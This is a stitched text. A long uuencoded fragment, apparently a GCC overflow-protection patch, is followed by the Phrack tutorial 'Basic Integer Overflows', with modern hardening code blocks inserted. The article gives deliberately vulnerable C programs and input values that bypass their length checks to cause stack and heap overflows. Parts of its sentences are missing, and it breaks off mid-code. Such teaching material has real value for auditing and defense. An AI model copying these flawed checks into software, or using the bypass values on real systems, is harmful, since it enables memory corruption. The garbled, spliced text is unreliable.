M([email protected]$5#3%]!5%1224)55$53("AF;BDI("$]($Y53$PI#[email protected]("`@(')E='5R
M;B`Q.PT*(`T**R`@:68H1$5#3%],04Y'7U-014-)1DE#("AF;[email protected]/[email protected],
M3"[email protected]#0HK"2`@<F5T=7)N(#`[#0HK("`-"B`@(')E='5R;B!$14-,7T1%0TQ!
M4D5$7TE.3$E.15]0("AF;[email protected])[email protected]$5#3%]%6%1%4DY!3"`H9FXI.PT*('T-
M"B`-"[email protected]+4YU<B!G8V,M,RXR+V=C8R]C+7!A<[email protected]+3,N,BUB
M5V5D($%U9R`Q-"`P,CHS,CHS-2`R,#`R#0HK*[email protected]+3,N,BUB;&EP+V=C
M=&]P;&[email protected]#[email protected](VEN8VQU9&[email protected](F=G8RYH(@T**R-I;F-L=61E(")B;&EP
[email protected]#[email protected]("`-"B`C:[email protected],5$E"651%7T-(05)3#[email protected](VEN8VQU9&[email protected]
M("`@("`@("![("0T(#[email protected]=')U=&AV86QU95]C;VYV97)S:6]N("@D-"D[#[email protected]
M"[email protected](&-?9FEN:7-H7W=H:6QE7W-T;71?8V]N9"`H=')U=&AV86QU95]C;VYV
M97)S:6]N("@D-"DL#[email protected]"0D)"[email protected]("`@)#QT='EP93XR*3L-"BL)"0EB;&EP
M7V-H96-K7VQO;W!?;&EM:[email protected]*"0\='1Y<&4^,BD[#[email protected]"[email protected]("0\='1Y<&4^
M)"`](&%D9%]S=&UT("@D/'1T>7!E/C(I.R!]#[email protected]"2`@8SDY7V)L;V-K7VQI
M;F5N;U]L86)E;&5D7W-T;70-"BT)"[email protected]#2$%)3E]35$U44R`H)#QT='EP
M93XV+"!72$E,15]"3T19("@D/'1T>7!E/C8I*[email protected]?0T**PD)>R!214-(04E.
M7U-43513("@D/'1T>7!E/C8L(%=(24Q%7T)/1%[email protected]*"0\='1Y<&4^-BDI.WT-
M"B`)?"!D;U]S=&UT7W-T87)T#[email protected]"2`@)[email protected](&5X<'(@)RDG("<[)PT*("`@
M("`@("`@("`@("`@("![($1/7T-/[email protected]*"0Q*2`]('1R=71H=F%L=65?8V]N
M97AP<B`G*2<-"B`)"[email protected]]27T584%(@*"0\='1Y<&4^,[email protected]/2`[email protected]?0T*
M(`[email protected](&,Y.5]B;&]C:U]L:6YE;F]?;&%B96QE9%]S=&UT#0HM("`@("`@("`@
M("`@("`@('[email protected]#2$%)3E]35$U44R`H)#QT='EP93XR+"!&3U)?0D]$62`H
M)#QT='EP93XR*2D[('T-"[email protected]("`@("`@("`@("`@("`@>R!214-(04E.7U-4
M("!B;&EP7V-H96-K7VQO;W!?;&EM:[email protected]*"0\='1Y<&4^,BD[('T-"B`)?"!3
[email protected]@)[email protected](&5X<'(@)RDG#[email protected]"0E[('-T;71?8V]U;G0K*SL-"B`)"2`@
M)#QT='EP93XD(#[email protected]]S=&%R=%]C87-E("@D,RD[('T-"[email protected]+4YU<B!G
M-SHU,SHS.2`R,#`R#0HK*[email protected]+3,N,BUB;&EP+V=C8R]C+71Y<&5C:RYC
M"4UO;B!$96,@(#(@,3DZ-#(Z,[email protected],C`P,@T*0$`@+30R+#[email protected]*S0R+#<@0$`-
M;'5D92`B=&%[email protected]#0HK(VEN8VQU9&[email protected](F)L:7`N:"(-"B`-"B`O*B!.
M;VYZ97)O(&EF('=E)W9E(&%L<F5A9'[email protected]<')I;G1E9"!A(")M:7-S:6YG(&)R
M86-E<R!A<F]U;[email protected]:6YI=&EA;&EZ97(B#[email protected]("`@;65S<V%G92!W:71H:[email protected]
M=&AI<R!I;FET:6%L:7IE<[email protected]("HO#0I`0"`M,34X-RPV("[email protected]+#$Q($!`
M#[email protected]("!44D5%7U-)1$5?149&14-44R`H<F5S=6QT*2`](#$[#[email protected]("!R97-U
M;'[email protected]/2!F;VQD("AR97-U;'0I.PT*(`T**R`@[email protected]@=&AE(&YE=R!C
M<F5A=&5D($-!3$Q?15A04B!F;W(@8FQI<"!C;VYD:71I;VXN(`T**R`@("[email protected]
M:[email protected]@8V]D92!R97%U:7)E9"[email protected]=&AE($-!3$Q?15A04B!W:6QL(&)E
M(')E<&QA8V5D('=I=&@@80T**R`@("[email protected]].1%]%6%!2(&AA=FEN9R!T:&[email protected]
M0T%,3%]%6%!2(&]N(&ET<R!F86QS92!S:61E+B`J+PT**R`@<F5S=6QT(#[email protected]
M8FQI<%]C:&5C:U]L;V]P7VQI;6ET*')E<W5L="D[#0HK#[email protected]("!I9B`H5D])
M1%]465!%7U`@*%12145?5%E012`H<F5S=6QT*2DI#[email protected]("`@(')E='5R;B!R
M97-U;'0[#[email protected]("!R971U<[email protected]<F5Q=6ER95]C;VUP;&5T95]T>7!E("AR97-U
M;'0I.PT*9&EF9B`M3G5R(&=C8RTS+C([email protected]@9V-C+3,N,BUB
M;&EP+V=C8R]F;&%G<RYH#[email protected]+3,N,B]G8V,O9FQA9W,N:`E4:'[email protected]
[email protected])36]N($1E8R`@,B`Q.3HT,CHS.2`R,#`R#0I`0"`M-C0Q+#[email protected]*S8T
M(&5X8V5P=&EO;G,@9F]R(&YO;BUC86QL(&EN<W1R=6-T:6]N<[email protected]("HO#[email protected]
M97AT97)N(&EN="!F;&%G7VYO;E]C86QL7V5X8V5P=&EO;G,[#[email protected]#[email protected]
M:7,@96YA8FQE9"[email protected]*B\-"BME>'1E<[email protected]:6YT(&9L86=?8FQI<%]S=&%T.PT*
M;V]P<R!A;[email protected];&]O<"UL:6ME(&-A;&QS("HO#0HK97AT97)N(&EN="!F;&%G
M7V)L:7`[#0HK#[email protected]%R;B!W:&5N(&9O<B!B;&EP(&-H96-K(&-O=6QD
M>'1E<[email protected]:6YT('=A<FY?8FQI<%]F;W)?;F]T7V5M:70[#0HK#[email protected]%R
M;B!W:&5N('=H:6QE(&)L:7`@[email protected]]U;&[email protected];F]T(&)E(&5M:71E9"[email protected]
M("U78FQI<%]W:&EL95]N;W1?96UI="[email protected]("HO#0HK97AT97)N(&EN="!W87)N
M7V)L:7!?=VAI;&5?;F]T7V5M:70[#0HK#[email protected]%R;B!W:&5N(&1O(&)L
M:7`@[email protected]]U;&[email protected];F]T(&)E(&5M:71E9"[email protected]("U78FQI<%]C86QL7VYO
M=%]E;6ET+B`@*B\-"BME>'1E<[email protected]:6YT('=A<FY?8FQI<%]C86QL7VYO=%]E
M=F5R"5=E9"!*[email protected],3,@,#<Z,C8Z,#[email protected],C`P,0T**RLK(&=C8RTS+C(M8FQI
M#0I`0"`M,3<T+#[email protected]*S$W-"PW($!`#[email protected]("!?56YW:6YD7U-J3&I?4F%I<V5%
M;G=I;F1?4VI,:E]297-U;64-"BL-"[email protected](",@0FEG($QO;W`@26YT96=E<B!0
M#[email protected]?0T*9&EF9B`M3G5R(&=C8RTS+C(O9V-C+VQI8F=C8S(N8R!G8V,M,RXR
[email protected]%Y(#(Q(#$V.C0T.C,X(#(P,#(-"BLK*R!G8V,M,RXR+6)L:7`O
M9V-C+VQI8F=C8S(N8PE-;[email protected]&5C("`R(#$Y.C0R.C,Y(#(P,#(-"D!`("TR
M,#0Y+#,@*S(P-#DL,[email protected]$`-"B`C96YD:[email protected][email protected]%1%][email protected]*B\-
M"B`-"B`C96YD:[email protected][email protected]%]E>&ET("HO#0HK#0HK(VEF9&5F($Q?8FQI<%]V
M:6]L871I;VX-"BMV;VED(%]?8FQI<%]V:6]L871I;[email protected]*'5N<VEG;F5D(&EN
M="!L:6UI="E[#0HK"0T**PEP<FEN=&8H(F)L:7`@=FEO;&%T:6]N("$A([email protected]
M*PEA8F]R="@I.PT**WT-"BLC96YD:68-"[email protected]+4YU<B!G8V,M,RXR+V=C
M8R]L:6)G8V,[email protected]@9V-C+3,N,BUB;&EP+V=C8R]L:6)G8V,[email protected]"BTM+2!G
M8V,M,RXR+V=C8R]L:6)G8V,[email protected])5V5D($%U9R`R,B`P-SHS-3HR,B`R,#`Q
M#0HK*[email protected]+3,N,BUB;&EP+V=C8R]L:6)G8V,[email protected])36]N($1E8R`@,B`Q
M.3HT,CHS.2`R,#`R#0I`0"`M,C(L-B`K,C(L-R!`0`T*("[email protected]#
M7TQ)0D=#0S)?2`T*("-D969I;[email protected]#7TQ)0D=#0S)?2`T*(`T**V5X=&5R
M;B!V;VED(%]?8FQI<%]V:6]L871I;[email protected]*'5N<VEG;F5D(&EN="!L:6UI="D[
M#[email protected])N(&EN="!?7V=C8U]B8VUP("AC;VYS="!U;G-I9VYE9"!C:&%R
M("HL(&-O;G-T('5N<VEG;F5D(&-H87(@*[email protected]<VEZ95]T*3L-"B!E>'1E<[email protected]
M=F]I9"!?7V-L96%R7V-A8VAE("AC:&%R("HL(&-H87(@*BD[#[email protected])N
M('9O:[email protected]]E<')I;G1F("AC;VYS="!C:&%R("HL(&-O;G-T(&-H87(@*[email protected]
M=6YS:[email protected]:6YT+"!C;VYS="!C:&%R("HI#0ID:69F("U.=7(@9V-C+3,N
M(&=C8RTS+C(O9V-C+W1O<&QE=BYC"5-U;[email protected],[email protected],C(Z-#@Z,[email protected],C`P
M9VAO;[email protected]#0HK(VEN8VQU9&[email protected](F)L:7`N:"(-"B`-"B`C:[email protected]&5F:6YE
M54='24Y'7TE.1D\I#[email protected](VEN8VQU9&[email protected](F1W87)F,F]U="YH(@T*0$`@+3DR
M+#[email protected]*SDS+#@@0$`-"B`C:6YC;'5D92`B:&%L9G!I8RYH(@T*("-E;[email protected]*
M05)%7T]"2D5#5%].04U%#[email protected]("`@=&\@05--7T9)3DE32%]$14-,05)%7T]"
M2D5#5"[email protected]("HO#[email protected]#0I`0"`M.#8W+#[email protected]*[email protected],"PX($!`#[email protected]("`@1F]R(&5A
[email protected]@=F%R:6%B;&4L('1H97)E(&ES(&%N(%]L;V<@=F%R:6%N="!W:&EC:"!I
M<R!T:&[email protected]<&]W97(-"B`@("!O9B!T=V\@;F]T(&QE<W,@=&AA;B!T:&[email protected]=F%R
M:6%B;&4L(&9O<B`[email protected];W5T<'5T+B`@*B\-"B`-"BL-"BL-"B!I;[email protected]
M86QI9VY?;&]O<',[#[email protected]:6YT(&%L:6=N7VQO;W!S7VQO9SL-"B!I;[email protected]
M9VY?;&]O<'-?;6%X7W-K:7`[#0I`0"`M.#<Y+#[email protected]*[email protected]"PQ-B!`0`T*(&EN
M="!A;&EG;E]F=6YC=&EO;G,[#[email protected]:6YT(&%L:6=N7V9U;F-T:6]N<U]L;V<[
M#[email protected]#[email protected]@;VYE(&5M:[email protected]<"!C:&5C:W,@=&\@<')O=&5C="!F
M<F]M('-O;[email protected]:6YT96=E<B!V=6QN97)A8FEL:71I97,-"[email protected]*B!E>'!L;VET
M:[email protected]/2`P.PT**VEN="!W87)N7V)L:7!?=VAI;&5?;F]T7V5M:[email protected]/2`P.PT*
M*VEN="!W87)N7V)L:7!?8V%L;%]N;W1?96UI="`](#`[#0HK#[email protected][email protected]&%B
M;&[email protected];[email protected]<W5P<&]R=&5D(&1E8G5G9VEN9R!F;W)M871S+B`@*B\-"B!S=&%T
M:6,@8V]N<[email protected]<W1R=6-T#[email protected]>PT*0$`@+3$Q-3`L-B`K,3$V-2PQ,"!`0`T*
M("`@($Y?*")297!O<[email protected];[email protected]<&5R;6%N96YT(&UE;6]R>2!A;&QO8V%T:6]N
[email protected],2P-"B`@("[email protected]')A<"!F;W(@<VEG;F5D(&]V97)F;&]W(&EN(&%D
M9&ET:6]N("\@<W5B=')A8W1I;[email protected]+R!M=6QT:7!L:6-A=&EO;B(I('TL#0HK
M("![(")B;&EP([email protected])F9L86=?8FQI<"[email protected],2P-"[email protected]("[email protected]="!":6<@
M3&]O<"!);G1E9V5R(%!R;W1E8W1I;[email protected]*&)L:7`I(&-H96-K<R(I('TL#0HK
M(E)E<&]R="!B;&EP('-T871I<W1I8W,B*2!]+`T*('T[#[email protected]#[email protected][email protected]&%B
M;&[email protected];[email protected];&%N9W5A9V4M<W!E8VEF:6,@;W!T:6]N<[email protected]("HO#0I`0"`M,30Y
M,2PW("LQ-3$P+#$S($!`#[email protected]("![(F1E<')E8V%T960M9&5C;&%R871I;VYS
M([email protected])G=A<FY?9&5P<F5C871E9%]D96-L+"`Q+`T*("`@($Y?*")787)N(&%B
M;W5T('5S97,@;[email protected]]A='1R:6)U=&[email protected]&5P<F5C871E9"DI(&1E8VQA
M<F%T:6]N<R(I('TL#[email protected]("![(FUI<W-I;F<M;F]R971U<FXB+"`F=V%R;E]M
M:6]N<R!W:&EC:"!M:6=H="!B92!C86YD:61A=&5S(&9O<B!A='1R:6)U=&[email protected]
M;F]R971U<FXB*2!]#0HK("`@3E\H(E=A<[email protected])[email protected];VYS('=H
M;B(I('TL#0HK("![(F)L:7!?9F]R7VYO=%]E;6ET([email protected])G=A<FY?8FQI<%]F
M;W)?;F]T7V5M:70L(#$L#0HK("`@3E\H(E=A<[email protected]=VAE;B!B;&EP(&-H96-K
M;&EP7W=H:6QE7VYO=%]E;6ET([email protected])G=A<FY?8FQI<%]W:&EL95]N;W1?96UI
M="[email protected],2P-"[email protected]("[email protected]%R;B!W:&5N(&)L:7`@[email protected];[email protected]=VAI;&[email protected]
M;&]O<"!C;W5L9"!N;[email protected]@96UI=&5D([email protected]?2P-"[email protected]('LB8FQI<%]C86QL
M7VYO=%]E;6ET([email protected])G=A<FY?8FQI<%]C86QL7VYO=%]E;6ET+"`Q+`T**R`@
M($Y?*")787)N('[email protected]<"!C:&5C:R!O9B!C86QL<R!C;W5L9"!N;[email protected]
[email protected]=&5D([email protected]?0T*('T[#[email protected]#[email protected]=F]I9`T*0$`@+34R,34L-B`K-3(T
M,"PY($!`#[email protected]("`O*B!3=&]P('1I;6EN9R!A;[email protected]<')I;[email protected]=&AE('1I;65S
M<E]P<FEN="`H<W1D97)R*3L-"BL-"[email protected]("\J(%!R:6YT(&)L:7`@<W1A=&ES
M=&EC<R`J+PT**R`@8FQI<%]S=&%T7W!R:6YT*'-T9&5R<BD[#[email protected]?0T*(`P-
M"B`O*B!%;G1R>2!P;VEN="!O9B!C8S$L(&-C,7!L=7,L(&IC,[email protected]<W,[email protected]
&[email protected]*

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x0a of 0x10

|=--------------------=[ Basic Integer Overflows ]=----------------------=|
|=-------------------=[ by blexim <[email protected]> ]=-------------------=|

1: Introduction
    1.1 What is an integer?
    1.2 What is an integer overflow?
    1.3 Why can they be dangerous?

2: Integer overflows
    2.1 Widthness overflows
        2.1.1 Exploiting
    2.2 Arithmetic overflows
        2.2.1 Exploiting

3: Signedness bugs
    3.1 What do they look like?
        3.1.1 Exploiting
    3.2 Signedness bugs caused by integer overflows

4: Real world examples
    4.1 Integer overflows
    4.2 Signedness bugs

--[ 1.0 Introduction

In this paper I'm going to describe two classes of programming bugs which
can sometimes allow a malicious user to modify the execution path of an
affected process.  Both of these classes of bug work by causing variables
to contain unexpected values, and so are not as "direct" as classes which
overwrite memory, e.g. buffer overflows or format strings.  All the
examples given in the paper are in C, so a basic familiarity with C is
assumed.  A knowledge of how integers are stored in memory is also useful,
but not essential.

----[ 1.1 What is an integer?

An integer, in the context of computing, is a variable capable of
representing a real number with no fractional part.  Integers are typically
the same size as a pointer on the system they are compiled on (i.e. on a 32
bit system, such as i386, an integer is 32 bits long, on a 64 bit system,
such as SPARC, an integer is 64 bits long).  Some compilers don't use
integers and pointers of the same size however, so for the sake of
simplicity all the examples refer to a 32 bit system with 32 bit integers,
longs and pointers.

Integers, like all variables, are just regions of memory.  When we talk
about integers, we usually represent them in decimal, as that is the
numbering system humans are most used to.  Computers, being digital, cannot
deal with decimal, so internally to the computer integers are stored in
binary.  Binary is another system of representing numbers which uses only
two numerals, 1 and 0, as opposed to the ten numerals used in decimal.  As
well as binary and decimal, hexadecimal (base sixteen) is often used in
computing as it is very easy to convert between binary and hexadecimal.

Since it is often necessary to store negative numbers, there needs to be a
mechanism to represent negative numbers using only binary.  The way this is
accomplished is by using the most significant bit (MSB) of a variable to
determine the sign: if the MSB is set to 1, the variable is interpreted as
negative; if it is set to 0, the variable is positive.  This can cause some
confusion, as will be explained in the section on signedness bugs, because
not all variables are signed, meaning they do not all use the MSB to
determine whether they are positive or negative.  These variables are known
as unsigned and can only be assigned positive values, whereas variables
which can be either positive or negative are called signed.

----[ 1.2 What is an integer overflow?

Since an integer is a fixed size (32 bits for the purposes of this paper),
there is a fixed maximum value it can store.  When an attempt is made to
store a value greater than this maximum value it is known as an integer
overflow.  The ISO C99 standard says that an integer overflow causes
"undefined behaviour", meaning that compilers conforming to the standard
may do anything they like from completely ignoring the overflow to aborting
the program.  Most compilers seem to ignore the overflow, resulting in an
unexpected or erroneous result being stored.

----[ 1.3 Why can they be dangerous?

Integer overflows cannot be detected after they have happened, so there is
no way for an application to tell if a result it has calculated previously
is in fact correct.  This can get dangerous if the calculation has to do
with the size of a buffer or how far into an array to index.  Of course
most integer overflows are not exploitable because memory is not being
directly overwritten, but sometimes they can lead to other classes of bugs,
frequently buffer overflows.  As well as this, integer overflows can be
difficult to spot, so even well audited code can spring surprises.

--[ 2.0 Integer overflows

So what happens when an integer overflow does happen?  ISO C99 has this to

    "A computation involving unsigned operands can never overflow,
    because a result that cannot be represented by the resulting unsigned
    integer type is reduced modulo the number that is one greater than
    the largest value that can be represented by the resulting type."

NB: modulo arithmetic involves dividing two numbers and taking the
    10 modulo 5 = 0
    11 modulo 5 = 1
so reducing a large value modulo (MAXINT + 1) can be seen as discarding the
portion of the value which cannot fit into an integer and keeping the rest.
In C, the modulo operator is a % sign.

This is a bit wordy, so maybe an example will better demonstrate the
typical "undefined behaviour":

We have two unsigned integers, a and b, both of which are 32 bits long.  We
assign to a the maximum value a 32 bit integer can hold, and to b we assign
1.  We add a and b together and store the result in a third unsigned 32 bit
integer called r:

    a = 0xffffffff
    b = 0x1
    r = a + b

Now, since the result of the addition cannot be represented using 32 bits,
the result, in accordance with the ISO standard, is reduced modulo

    r = (0xffffffff + 0x1) % 0x100000000
    r = (0x100000000) % 0x100000000 = 0

Reducing the result using modulo arithmetic basically ensures that only the
lowest 32 bits of the result are used, so integer overflows cause the
result to be truncated to a size that can be represented by the variable.
This is often called a "wrap around", as the result appears to wrap around
to 0.
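
The wrap around above, and a way to refuse it before it happens, as an added
example that is not part of the original paper.  The function names and the
header-plus-records size calculation are hypothetical; the inputs in main()
are constructed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* The reduction described above, spelled out: do the sum in 64 bits,
 * then reduce modulo 0x100000000 so only the low 32 bits survive. */
uint32_t wrapping_add_u32(uint32_t a, uint32_t b)
{
    return (uint32_t)(((uint64_t)a + b) % 0x100000000ULL);
}

/* Checked addition: a + b fits in 32 bits only if b <= UINT32_MAX - a.
 * The test uses the operands, so it runs before anything can wrap. */
bool checked_add_u32(uint32_t a, uint32_t b, uint32_t *out)
{
    if (b > UINT32_MAX - a)
        return false;
    *out = a + b;
    return true;
}

/* Checked multiplication: a * b fits only if b <= UINT32_MAX / a. */
bool checked_mul_u32(uint32_t a, uint32_t b, uint32_t *out)
{
    if (a != 0 && b > UINT32_MAX / a)
        return false;
    *out = a * b;
    return true;
}

/* Hypothetical size calculation: a fixed header followed by `count`
 * records of `record_size` bytes.  Fails instead of returning a
 * wrapped (too small) size. */
bool record_buffer_size(uint32_t count, uint32_t record_size,
                        uint32_t header, uint32_t *out)
{
    uint32_t body;

    if (!checked_mul_u32(count, record_size, &body))
        return false;
    return checked_add_u32(body, header, out);
}

int main(void)
{
    uint32_t size;

    printf("0xffffffff + 0x1 wraps to 0x%x\n",
           (unsigned)wrapping_add_u32(0xffffffffu, 0x1u));

    /* Constructed inputs: one ordinary request, one that would wrap. */
    if (record_buffer_size(1000u, 16u, 8u, &size))
        printf("1000 records -> %u bytes\n", (unsigned)size);
    if (!record_buffer_size(0x10000000u, 16u, 8u, &size))
        printf("0x10000000 records -> rejected, size does not fit\n");

    return 0;
}
```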

----[ 2.1 Widthness overflows

So an integer overflow is the result of attempting to store a value in a
variable which is too small to hold it.  The simplest example of this can
be demonstrated by simply assigning the contents of a large variable to a
smaller one:

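    /* ex1.c - loss of precision */
    #include <stdio.h>

    int main(void){
            int l;
            short s;
            char c;

            l = 0xdeadbeef;
            s = l;          /* only the low 16 bits are kept */
            c = l;          /* only the low 8 bits are kept */

            /* sizeof yields a size_t, so cast it to match %d */
            printf("l = 0x%x (%d bits)\n", l, (int)(sizeof(l) * 8));
            printf("s = 0x%x (%d bits)\n", s, (int)(sizeof(s) * 8));
            printf("c = 0x%x (%d bits)\n", c, (int)(sizeof(c) * 8));

            return 0;
    }
    /* EOF */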

The output of which looks like this:

    nova:signed {48} ./ex1
    l = 0xdeadbeef (32 bits)
    s = 0xffffbeef (16 bits)
    c = 0xffffffef (8 bits)

Since each assignment causes the bounds of the values that can be stored in
each type to be exceeded, the value is truncated so that it can fit in the
variable it is assigned to.

It is worth mentioning integer promotion here.  When a calculation
involving operands of different sizes is performed, the smaller operand is
"promoted" to the size of the larger one.  The calculation is then
performed with these promoted sizes and, if the result is to be stored in
the smaller variable, the result is truncated to the smaller size again.
For example:

    int i;
    short s;

    s = i;

A calculation is being performed with different sized operands here.  What
happens is that the variable s is promoted to an int (32 bits long), then
the contents of i is copied into the new promoted s.  After this, the
contents of the promoted variable are "demoted" back to 16 bits in order to
be saved in s.  This demotion can cause the result to be truncated if it is
greater than the maximum value s can hold.

------[ 2.1.1 Exploiting

Integer overflows are not like most common bug classes.  They do not allow
direct overwriting of memory or direct execution flow control, but are much
more subtle.  The root of the problem lies in the fact that there is no way
for a process to check the result of a computation after it has happened,
so there may be a discrepancy between the stored result and the correct
result.  Because of this, most integer overflows are not actually
exploitable.  Even so, in certain cases it is possible to force a crucial
variable to contain an erroneous value, and this can lead to problems later
in the code.

Because of the subtlety of these bugs, there is a huge number of situations
in which they can be exploited, so I will not attempt to cover all
exploitable conditions.  Instead, I will provide examples of some
situations which are exploitable, in the hope of inspiring the reader in
their own research :)

Example 1:

    /* width1.c - exploiting a trivial widthness bug */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[]){
            unsigned short s;
            int i;
            char buf[80];

            if(argc < 3){
                    return -1;
            }

            i = atoi(argv[1]);
            s = i;

            if(s >= 80){            /* [w1] */
                    printf("Oh no you don't!\n");
                    return -1;
            }

            printf("s = %d\n", s);

            memcpy(buf, argv[2], i);
            buf[i] = '\0';
            printf("%s\n", buf);

            return 0;
    }

While a construct like this would probably never show up in real life code,
it serves well as an example.  Take a look at the following inputs:

    nova:signed {100} ./width1 5 hello
    s = 5
    nova:signed {101} ./width1 80 hello
    Oh no you don't!
    nova:signed {102} ./width1 65536 hello
    s = 0
    Segmentation fault (core dumped)

The length argument is taken from the command line and held in the integer
i.  When this value is transferred into the short integer s, it is
truncated if the value is too great to fit into s (i.e. if the value is
greater than 65535).  Because of this, it is possible to bypass the bounds
check at [w1] and overflow the buffer.  After this, standard stack smashing
techniques can be used to exploit the process.
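
The truncation that defeats [w1], next to a length check that is not fooled
by it. This is an added example, not part of the original article; the names
flawed_check and safe_check are made up here, and a 16-bit short is assumed
(modelled with uint16_t).

```c
#include <stdint.h>
#include <stdio.h>

#define BUF_SIZE 80   /* size of buf in width1.c */

/* The pattern from width1.c: the bound is tested on a 16-bit copy of the
 * length, while the caller goes on to use the original int.
 * Returns 1 if the check lets the length through, 0 if it rejects it. */
int flawed_check(int i)
{
    uint16_t s = (uint16_t)i;       /* only the low 16 bits of i survive */
    return s < BUF_SIZE;
}

/* Hardened form: test the value in its original width, before any
 * narrowing, and reject negative lengths as well.  The strict '<' leaves
 * room for the terminator that width1.c writes at buf[i]. */
int safe_check(int i)
{
    return i >= 0 && i < BUF_SIZE;
}

int main(void)
{
    /* 5, 80 and 65536 are the article's inputs; the rest are constructed */
    const int samples[] = { 5, 79, 80, 65536, 65541, -65531 };
    size_t n;

    for (n = 0; n < sizeof(samples) / sizeof(samples[0]); n++)
        printf("i = %6d  low 16 bits = %5u  flawed: %s  hardened: %s\n",
               samples[n], (unsigned)(uint16_t)samples[n],
               flawed_check(samples[n]) ? "pass" : "reject",
               safe_check(samples[n]) ? "pass" : "reject");
    return 0;
}
```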

----[ 2.2 Arithmetic overflows

As shown in section 2.0, if an attempt is made to store a value in an
integer which is greater than the maximum value the integer can hold, the
value will be truncated.  If the stored value is the result of an
arithmetic operation, any part of the program which later uses the result
will run incorrectly as the result of the arithmetic being incorrect.
Consider this example demonstrating the wrap around shown earlier:

    /* ex2.c - an integer overflow */
    #include <stdio.h>

    int main(void){
            unsigned int num = 0xffffffff;

            printf("num is %d bits long\n", sizeof(num) * 8);
            printf("num = 0x%x\n", num);
            printf("num + 1 = 0x%x\n", num + 1);

            return 0;
    }
    /* EOF */

The output of this program looks like this:

    nova:signed {4} ./ex2
    num is 32 bits long
    num = 0xffffffff
    num + 1 = 0x0

The astute reader will have noticed that 0xffffffff is decimal -1, so it
appears that we're just doing

    1 + (-1) = 0

Whilst this is one way of looking at what's going on, it may cause some
confusion since the variable num is unsigned and therefore all arithmetic
done on it will be unsigned.  As it happens, a lot of signed arithmetic
depends on integer overflows, as the following demonstrates (assume both
operands are 32 bit variables):

-700       + 800   = 100
0xfffffd44 + 0x320 = 0x100000064

Since the result of the addition exceeds the range of the variable, the
lowest 32 bits are used as the result.  These low 32 bits are 0x64, which
is equal to decimal 100.

Since an integer is signed by default, an integer overflow can cause a
change in signedness which can often have interesting effects on subsequent
code.  Consider the following example:

    /* ex3.c - change of signedness */
    #include <stdio.h>

    int main(void){
            int l;

            l = 0x7fffffff;

            printf("l = %d (0x%x)\n", l, l);
            printf("l + 1 = %d (0x%x)\n", l + 1 , l + 1);

            return 0;
    }
    /* EOF */

The output of which is:

    nova:signed {38} ./ex3
    l = 2147483647 (0x7fffffff)
    l + 1 = -2147483648 (0x80000000)

Here the integer is initialised with the highest positive value a signed
long integer can hold.  When it is incremented, the most significant bit
(indicating signedness) is set and the integer is interpreted as being

Addition is not the only arithmetic operation which can cause an integer to
overflow.  Almost any operation which changes the value of a variable can
cause an overflow, as demonstrated in the following example:

    /* ex4.c - various arithmetic overflows */
    #include <stdio.h>

    int main(void){
            int l, x;

            l = 0x40000000;

            printf("l = %d (0x%x)\n", l, l);

            x = l + 0xc0000000;
            printf("l + 0xc0000000 = %d (0x%x)\n", x, x);

            x = l * 0x4;
            printf("l * 0x4 = %d (0x%x)\n", x, x);

            x = l - 0xffffffff;
            printf("l - 0xffffffff = %d (0x%x)\n", x, x);

            return 0;
    }
    /* EOF */


    nova:signed {55} ./ex4
    l = 1073741824 (0x40000000)
    l + 0xc0000000 = 0 (0x0)
    l * 0x4 = 0 (0x0)
    l - 0xffffffff = 1073741825 (0x40000001)

The addition is causing an overflow in exactly the same way as the first
example, and so is the multiplication, although it may seem different.  In
both cases the result of the arithmetic is too great to fit in an integer,
so it is reduced as described above.  The subtraction is slightly
different, as it is causing an underflow rather than an overflow: an
attempt is made to store a value lower than the minimum value the integer
can hold, causing a wrap around.  In this way we are able to force an
addition to subtract, a multiplication to divide or a subtraction to add.

------[ 2.2.1 Exploiting

One of the most common ways arithmetic overflows can be exploited is when a
calculation is made about how large a buffer must be allocated.  Often a
program must allocate space for an array of objects, so it uses the
malloc(3) or calloc(3) routines to reserve the space and calculates how
much space is needed by multiplying the number of elements by the size of
an object.  As has been previously shown, if we are able to control either
of these operands (number of elements or object size) we may be able to
mis-size the buffer, as the following code fragment shows:

    int *myfunction(int *array, int len){
        int *myarray, i;

        myarray = malloc(len * sizeof(int));    /* [1] */
        if(myarray == NULL){
            return NULL;
        }

        for(i = 0; i < len; i++){              /* [2] */
            myarray[i] = array[i];
        }

        return myarray;
    }

This seemingly innocent function could bring about the downfall of a system
due to its lack of checking of the len parameter.  The multiplication at
[1] can be made to overflow by supplying a high enough value for len, so we
can force the buffer to be any length we choose.  By choosing a suitable
value for len, we can cause the loop at [2] to write past the end of the
myarray buffer, resulting in a heap overflow.  This could be leveraged into
executing arbitrary code on certain implementations by overwriting malloc
control structures, but that is beyond the scope of this article.

Another example:

    int catvars(char *buf1, char *buf2, unsigned int len1,
                unsigned int len2){
        char mybuf[256];

        if((len1 + len2) > 256){    /* [3] */
            return -1;
        }

        memcpy(mybuf, buf1, len1);      /* [4] */
        memcpy(mybuf + len1, buf2, len2);

        return 0;
    }

In this example, the check at [3] can be bypassed by using suitable values
for len1 and len2 that will cause the addition to overflow and wrap around
to a low number.  For example, the following values:

    len1 = 0x104
    len2 = 0xfffffffc

when added together would result in a wrap around with a result of 0x100
(decimal 256).  This would pass the check at [3], then the memcpy(3)'s at
[4] would copy data well past the end of the buffer.
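
The two calculations above, the size at [1] and the sum at [3], with checks
that are made before the arithmetic instead of after it. This is an added
example, not code from the original article; the function names are made up
here, and 32-bit arithmetic is assumed to match the article's values.

```c
#include <stdint.h>
#include <stdio.h>

#define MYBUF_SIZE 256u   /* size of mybuf in catvars() */

/* The test at [3] as written: the sum is formed in 32 bits and wraps.
 * Returns 1 if the lengths are accepted, 0 if they are rejected. */
int flawed_sum_check(uint32_t len1, uint32_t len2)
{
    uint32_t sum = len1 + len2;          /* reduced modulo 0x100000000 */
    return !(sum > MYBUF_SIZE);
}

/* Wrap-free form: never add the untrusted lengths; compare each one
 * against the space that is still left in the buffer. */
int safe_sum_check(uint32_t len1, uint32_t len2)
{
    return len1 <= MYBUF_SIZE && len2 <= MYBUF_SIZE - len1;
}

/* The size calculation at [1] in myfunction(), done in 32 bits. */
uint32_t wrapped_alloc_size(uint32_t count, uint32_t elsize)
{
    return count * elsize;
}

/* Checked form: divide before multiplying, and fail if the product would
 * not fit.  Returns 0 and stores the size in *out, or -1 on overflow. */
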